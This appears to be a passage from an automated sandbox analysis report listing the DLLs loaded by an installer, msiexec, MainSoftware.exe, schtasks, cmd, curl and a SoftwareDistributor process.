    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coreuicomponents.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: twinapi.appcore.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: twinapi.appcore.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.ui.immersive.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: version.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: version.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\1.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: davhlpr.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: lpk.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msihnd.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: icu.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wshunix.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
    Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: icu.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: dnsapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: dhcpcsvc6.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: winnsi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: winhttp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: mswsock.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: wshunix.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: winrnr.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: fwpuclnt.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: rasadhlp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: nlaapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: napinsp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: pnrpnsp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: wshbth.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: devobj.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: sspicli.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: schannel.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: mskeyprotect.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: ntasn1.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: ncrypt.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: ncryptsslp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: msasn1.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: cryptsp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: rsaenh.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: cryptbase.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: gpapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: uxtheme.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: windows.storage.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: wldp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: propsys.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: profapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: edputil.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: urlmon.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: iertutil.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: srvcli.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: netutils.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: windows.staterepositoryps.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: wintypes.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: appresolver.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: bcp47langs.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: slc.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: userenv.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: sppc.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: onecorecommonproxystub.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Section loaded: apphelp.dll
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Section loaded: apphelp.dll
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
    Source: C:\Windows\System32\curl.exe | Section loaded: secur32.dll
    Source: C:\Windows\System32\curl.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\curl.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\curl.exe | Section loaded: mswsock.dll
    Source: C:\Windows\System32\curl.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\curl.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\System32\curl.exe | Section loaded: rasadhlp.dll
    Source: C:\Windows\System32\curl.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\System32\curl.exe | Section loaded: schannel.dll
    Source: C:\Windows\System32\curl.exe | Section loaded: mskeyprotect.dll
    Source: C:\Windows\System32\curl.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\System32\curl.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\System32\curl.exe | Section loaded: ncryptsslp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: apphelp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: icu.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: windows.storage.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: wldp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: dnsapi.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: dhcpcsvc6.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: winnsi.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: winhttp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: mswsock.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: wshunix.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: winrnr.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: fwpuclnt.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: rasadhlp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: nlaapi.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: wshbth.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: devobj.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: pnrpnsp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: napinsp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: sspicli.dll
